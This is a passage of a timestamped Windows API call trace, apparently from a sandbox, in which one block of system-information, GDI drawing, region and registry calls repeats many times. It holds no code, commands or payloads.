lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.189] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.189] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.189] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.189] BeginPath (hdc=0x0) returned 0 [0088.189] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.189] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.189] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.189] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.189] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.189] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.189] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401d6 [0088.189] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401d3 [0088.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ff9 [0088.189] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ffa [0088.189] CombineRgn (hrgnDst=0x1040ff9, hrgnSrc1=0x330401d6, hrgnSrc2=0x350401d3, iMode=1) returned 1 [0088.189] CombineRgn (hrgnDst=0x1040ffa, hrgnSrc1=0x330401d6, hrgnSrc2=0x350401d3, iMode=4) returned 2 [0088.189] CreateSolidBrush (color=0xff) returned 0x2100ff8 [0088.190] CreateSolidBrush (color=0xff0000) returned 0x1100ffb [0088.190] DeleteObject (ho=0x1100ffb) returned 1 [0088.190] DeleteObject (ho=0x350401d3) returned 1 [0088.190] DeleteObject (ho=0x330401d6) returned 1 [0088.190] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.190] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.190] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.190] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.190] BeginPath (hdc=0x0) returned 0 [0088.190] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.190] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.190] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.190] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401d3 [0088.190] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401d6 [0088.190] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ffc [0088.190] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ffd [0088.190] CombineRgn (hrgnDst=0x1040ffc, hrgnSrc1=0x360401d3, hrgnSrc2=0x340401d6, iMode=1) returned 1 [0088.190] CombineRgn (hrgnDst=0x1040ffd, hrgnSrc1=0x360401d3, hrgnSrc2=0x340401d6, iMode=4) returned 2 [0088.190] CreateSolidBrush (color=0xff) returned 0x2100ffb [0088.190] CreateSolidBrush (color=0xff0000) returned 0x1100ffe [0088.190] DeleteObject (ho=0x1100ffe) returned 1 [0088.190] DeleteObject (ho=0x340401d6) returned 1 [0088.190] DeleteObject (ho=0x360401d3) returned 1 [0088.190] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.190] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.190] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.190] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.190] BeginPath (hdc=0x0) returned 0 [0088.190] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.190] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.190] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.190] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.190] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.191] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401d6 [0088.191] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401d3 [0088.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fff [0088.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041000 [0088.191] CombineRgn (hrgnDst=0x1040fff, hrgnSrc1=0x350401d6, hrgnSrc2=0x370401d3, iMode=1) returned 1 [0088.191] CombineRgn (hrgnDst=0x1041000, hrgnSrc1=0x350401d6, hrgnSrc2=0x370401d3, iMode=4) returned 2 [0088.191] CreateSolidBrush (color=0xff) returned 0x2100ffe [0088.191] CreateSolidBrush (color=0xff0000) returned 0x1101001 [0088.191] DeleteObject (ho=0x1101001) returned 1 [0088.191] DeleteObject (ho=0x370401d3) returned 1 [0088.191] DeleteObject (ho=0x350401d6) returned 1 [0088.191] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.191] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.191] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.191] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.191] BeginPath (hdc=0x0) returned 0 [0088.191] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.191] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.191] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.191] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.191] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.191] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.191] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.191] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401d3 [0088.191] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401d6 [0088.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041002 [0088.191] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041003 [0088.191] CombineRgn (hrgnDst=0x1041002, hrgnSrc1=0x380401d3, hrgnSrc2=0x360401d6, iMode=1) returned 1 [0088.191] CombineRgn (hrgnDst=0x1041003, hrgnSrc1=0x380401d3, hrgnSrc2=0x360401d6, iMode=4) returned 2 [0088.191] CreateSolidBrush (color=0xff) returned 0x2101001 [0088.191] CreateSolidBrush (color=0xff0000) returned 0x1101004 [0088.192] DeleteObject (ho=0x1101004) returned 1 [0088.192] DeleteObject (ho=0x360401d6) returned 1 [0088.192] DeleteObject (ho=0x380401d3) returned 1 [0088.192] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.192] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.192] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.192] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.192] BeginPath (hdc=0x0) returned 0 [0088.192] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.192] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.192] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.192] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.192] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401d6 [0088.192] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401d3 [0088.192] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041005 [0088.192] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041006 [0088.192] CombineRgn (hrgnDst=0x1041005, hrgnSrc1=0x370401d6, hrgnSrc2=0x390401d3, iMode=1) returned 1 [0088.192] CombineRgn (hrgnDst=0x1041006, hrgnSrc1=0x370401d6, hrgnSrc2=0x390401d3, iMode=4) returned 2 [0088.192] CreateSolidBrush (color=0xff) returned 0x2101004 [0088.192] CreateSolidBrush (color=0xff0000) returned 0x1101007 [0088.192] DeleteObject (ho=0x1101007) returned 1 [0088.192] DeleteObject (ho=0x390401d3) returned 1 [0088.192] DeleteObject (ho=0x370401d6) returned 1 [0088.192] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.192] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.192] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.192] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.192] BeginPath (hdc=0x0) returned 0 [0088.192] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.192] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.192] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.192] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.192] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.192] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.193] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401d3 [0088.193] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401d6 [0088.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041008 [0088.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041009 [0088.193] CombineRgn (hrgnDst=0x1041008, hrgnSrc1=0x3a0401d3, hrgnSrc2=0x380401d6, iMode=1) returned 1 [0088.193] CombineRgn (hrgnDst=0x1041009, hrgnSrc1=0x3a0401d3, hrgnSrc2=0x380401d6, iMode=4) returned 2 [0088.193] CreateSolidBrush (color=0xff) returned 0x2101007 [0088.193] CreateSolidBrush (color=0xff0000) returned 0x110100a [0088.193] DeleteObject (ho=0x110100a) returned 1 [0088.193] DeleteObject (ho=0x380401d6) returned 1 [0088.193] DeleteObject (ho=0x3a0401d3) returned 1 [0088.193] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.193] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.193] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.193] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.193] BeginPath (hdc=0x0) returned 0 [0088.193] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.193] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.193] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.193] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.193] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401d6 [0088.193] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401d3 [0088.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104100b [0088.193] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104100c [0088.193] CombineRgn (hrgnDst=0x104100b, hrgnSrc1=0x390401d6, hrgnSrc2=0x3b0401d3, iMode=1) returned 1 [0088.193] CombineRgn (hrgnDst=0x104100c, hrgnSrc1=0x390401d6, hrgnSrc2=0x3b0401d3, iMode=4) returned 2 [0088.193] CreateSolidBrush (color=0xff) returned 0x210100a [0088.193] CreateSolidBrush (color=0xff0000) returned 0x110100d [0088.193] DeleteObject (ho=0x110100d) returned 1 [0088.193] DeleteObject (ho=0x3b0401d3) returned 1 [0088.193] DeleteObject (ho=0x390401d6) returned 1 [0088.193] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.193] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.194] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.194] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.194] BeginPath (hdc=0x0) returned 0 [0088.194] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.194] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.194] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.194] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.194] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401d3 [0088.194] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401d6 [0088.194] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104100e [0088.194] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104100f [0088.194] CombineRgn (hrgnDst=0x104100e, hrgnSrc1=0x3c0401d3, hrgnSrc2=0x3a0401d6, iMode=1) returned 1 [0088.194] CombineRgn (hrgnDst=0x104100f, hrgnSrc1=0x3c0401d3, hrgnSrc2=0x3a0401d6, iMode=4) returned 2 [0088.194] CreateSolidBrush (color=0xff) returned 0x210100d [0088.194] CreateSolidBrush (color=0xff0000) returned 0x1101010 [0088.194] DeleteObject (ho=0x1101010) returned 1 [0088.194] DeleteObject (ho=0x3a0401d6) returned 1 [0088.194] DeleteObject (ho=0x3c0401d3) returned 1 [0088.194] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.194] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.194] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.194] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.194] BeginPath (hdc=0x0) returned 0 [0088.194] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.194] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.194] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.194] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.195] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401d6 [0088.195] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401d3 [0088.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041011 [0088.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041012 [0088.195] CombineRgn (hrgnDst=0x1041011, hrgnSrc1=0x3b0401d6, hrgnSrc2=0x3d0401d3, iMode=1) returned 1 [0088.195] CombineRgn (hrgnDst=0x1041012, hrgnSrc1=0x3b0401d6, hrgnSrc2=0x3d0401d3, iMode=4) returned 2 [0088.195] CreateSolidBrush (color=0xff) returned 0x2101010 [0088.195] CreateSolidBrush (color=0xff0000) returned 0x1101013 [0088.195] DeleteObject (ho=0x1101013) returned 1 [0088.195] DeleteObject (ho=0x3d0401d3) returned 1 [0088.195] DeleteObject (ho=0x3b0401d6) returned 1 [0088.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.195] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.195] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.195] BeginPath (hdc=0x0) returned 0 [0088.195] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.195] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 